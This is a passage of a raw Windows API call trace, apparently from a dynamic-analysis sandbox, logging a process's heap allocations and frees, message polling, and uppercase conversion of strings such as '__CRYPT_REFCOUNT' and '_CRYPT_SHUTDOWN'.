0x2e54e98 [0269.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0269.240] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0269.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0269.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51eb0 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c70 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0269.242] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.242] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0269.242] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0269.242] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0269.242] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.243] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0269.243] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0269.245] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.245] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0269.245] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.245] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.245] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0269.246] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.247] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0269.247] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.247] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0269.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0269.248] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0269.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0269.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.257] RtlAllocateHeap (HeapHandle=0x970000, 